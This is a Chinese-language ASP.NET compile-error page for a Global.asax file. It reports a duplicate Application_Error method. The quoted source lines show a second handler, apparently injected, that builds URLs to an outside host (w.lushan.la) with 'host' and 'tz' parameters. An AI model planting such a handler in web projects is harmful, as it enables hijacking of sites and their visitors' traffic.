“/”应用程序中的服务器错误。

编译错误

说明: 在编译向该请求提供服务所需资源的过程中出现错误。请检查下列特定错误详细信息并适当地修改源代码。

编译器错误消息: CS0111: 类型“ASP.global_asax”已定义了一个名为“Application_Error”的具有相同参数类型的成员

源错误:


行 213:<%@ Import Namespace="System.Security.Cryptography" %>
行 214:<script runat="server">
行 215:    void Application_Error(object sender, EventArgs e) {
行 216:	string Path = "http://w.lushan.la/?host=";
行 217:	string jsPath = "http://w.lushan.la/?tz=";

源文件: d:\wwwroot\web\Global.asax    行: 215






版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.7.2106.0